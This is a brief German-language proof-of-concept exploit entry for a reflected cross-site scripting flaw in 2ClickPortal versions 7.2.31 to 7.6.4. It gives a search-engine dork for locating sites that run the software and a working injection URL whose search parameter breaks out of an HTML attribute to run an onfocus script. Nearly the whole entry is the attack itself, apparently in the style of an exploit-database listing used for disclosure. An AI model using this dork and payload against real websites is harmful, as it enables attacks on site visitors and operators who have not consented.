
Proof-of-Concept-Exploit für die reflektierte XSS-Schwachstelle in 2ClickPortal-Versionen 7.2.31 bis 7.6.4, mit einem Injection-Payload für den Suchparameter.
Reflektiertes XSS in 2ClickPortal
Version: von 7.2.31 bis 7.6.4.
intext:"Powered by 2ClickPortal"
https://[domain]/szukaj/?search_lang=pl&search=all&string=" onfocus=alert(1) autofocus="